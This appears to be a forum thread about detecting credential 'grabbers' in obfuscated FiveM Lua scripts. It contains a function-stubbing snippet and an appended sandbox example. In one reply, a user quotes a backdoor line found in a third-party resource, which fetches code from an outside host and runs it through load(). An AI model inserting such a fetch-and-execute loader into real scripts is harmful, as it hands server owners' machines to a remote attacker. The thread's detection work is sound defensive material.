
GRABBER DETECTION - 70% method [FREE]

rafaeninja Started 8 replies 1,058 views
#1
70% method for finding out if an obfuscated script has a grabber.

How to use:

Just add it to the first line of any .lua file.


How it works:

Basically, it disables some functions and prints the parameters of these functions.

These specific functions may or may not call malicious code hosted somewhere, or hidden within the script folder.

However, as mentioned, it is 70% effective as there are several other ways.


Note:

To add more functions, just follow the same pattern.


[attachment removed]

-------------------------------------------------------------------------------------------------------------




-- Each definition below replaces a global function with a stub that only
-- prints the arguments it was called with; the original behaviour is disabled.

-- Outbound HTTP request
function PerformHttpRequest(url, callback, method, data, headers)
    print("PerformHttpRequest:")
    print("URL:", url)
    print("Callback:", callback)
    print("Method:", method)
    print("Data:", data)
    print("Headers:", headers)
end

-- Webhook message
function SendWebhookMessage(webhook, message)
    print("SendWebhookMessage:")
    print("Webhook:", webhook)
    print("Message:", message)
end

-- DUI (browser surface) creation
function CreateDui(link, x, y)
    print("CreateDui:")
    print("Link:", link)
    print("X Coordinate:", x)
    print("Y Coordinate:", y)
end

-- Code loading from a string
function loadstring(str, chunkname)
    print("loadstring:")
    print("String:", str)
    print("Chunk Name:", chunkname)
end

-- Code loading from files and modules
function dofile(filename)
    print("dofile:")
    print("Filename:", filename)
end

function require(modname)
    print("require:")
    print("Module Name:", modname)
end

function loadfile(filename, mode, env)
    print("loadfile:")
    print("Filename:", filename)
    print("Mode:", mode)
    print("Environment:", env)
end

[/attachment]
#1
Thank you, nice script, respect for you
#2
I have just updated your code for a better experience



-- Function to replace the native functions with versions that print the information

local function overrideNativeFunctions()

local nativeEnv ...


#3
This shit is a backdoor, do not use it:

PerformHttpRequest('https://thedreamoffivem.com/i?to=Wdv1M', function (e, d) pcall(function() assert(load(d))() end) end)

So I found it in VMS Spawn Selector in server/server.lua
#4
Does it avoid function execution ?
#5




micky1062 wrote:

Does it avoid function execution ?

In my opinion, replacing functions can interfere with the execution of the encrypted script, but its effectiveness depends on how the encrypted script was written and whether it makes use of the replaced functions.



I wouldn't risk trusting your home host like that, you have to use a VPS to test this.
#6
Respect my man! Appreciate that! :)
#7
Very nice work and very nice job
#8
thx for sharing good scripts
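
The stubbing idea from the first post, taken one step further as an added example (not code from any poster in this thread): the untrusted source is compiled into an environment table that holds only logging stubs, including `load`, which the loader quoted in post #3 calls and the original stub list does not cover. It assumes a standalone Lua 5.3/5.4 interpreter rather than the FiveM runtime; `stub`, `make_env`, `inspect` and the sample chunk with its example.invalid URL are hypothetical names and constructed input.

```lua
-- Added example, not code from the thread. Assumes a standalone Lua 5.3/5.4
-- interpreter; the sample chunk and the example.invalid URL are constructed.
local calls = {}  -- log of every intercepted call

-- Make a stub that records its name and arguments and returns nothing.
local function stub(name)
  return function(...)
    local args = table.pack(...)
    for i = 1, args.n do args[i] = tostring(args[i]) end
    calls[#calls + 1] = name .. "(" .. table.concat(args, ", ") .. ")"
  end
end

-- Function names from the first post, plus `load` (used by the post #3 loader).
local hooked = { "PerformHttpRequest", "SendWebhookMessage", "CreateDui",
                 "loadstring", "dofile", "require", "loadfile", "load" }

-- The chunk sees only this table: a few harmless helpers and the stubs.
local function make_env()
  local env = { tostring = tostring, type = type, pairs = pairs, ipairs = ipairs,
                string = string, table = table, math = math,
                pcall = pcall, assert = assert, print = stub("print") }
  for _, name in ipairs(hooked) do env[name] = stub(name) end
  -- Drive the HTTP callback with a constructed body to see where the response goes.
  local log_http = env.PerformHttpRequest
  env.PerformHttpRequest = function(url, callback, ...)
    log_http(url, callback, ...)
    if type(callback) == "function" then
      pcall(callback, 200, "-- constructed response body", {})
    end
  end
  return env
end

-- Compile as text only ("t" rejects precompiled bytecode) and run sandboxed.
local function inspect(source)
  calls = {}
  local chunk, err = load(source, "=untrusted", "t", make_env())
  if not chunk then return nil, err end
  pcall(chunk)
  return calls
end

-- Constructed sample with the same shape as the line quoted in post #3.
local sample = [[
PerformHttpRequest('https://example.invalid/i', function(e, d)
  pcall(function() assert(load(d))() end)
end)]]
for _, line in ipairs(assert(inspect(sample))) do print(line) end
```

The log shows the request URL followed by a `load(...)` entry carrying the response body, which is the fetch-then-execute pattern from post #3. The environment table limits what the chunk can name, not how long it runs, so the advice in post #5 to test on a VPS rather than a home host still applies.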